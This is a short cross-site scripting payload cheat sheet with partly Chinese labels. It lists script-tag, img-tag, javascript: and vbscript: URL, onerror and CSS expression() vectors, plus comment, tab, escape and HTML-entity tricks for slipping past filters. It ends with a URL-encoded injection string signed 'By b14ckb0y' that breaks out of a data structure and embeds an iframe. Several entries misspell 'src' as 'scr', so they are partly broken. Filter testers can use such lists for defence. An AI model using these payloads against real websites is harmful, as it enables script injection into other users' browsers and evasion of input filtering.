<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (? is whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["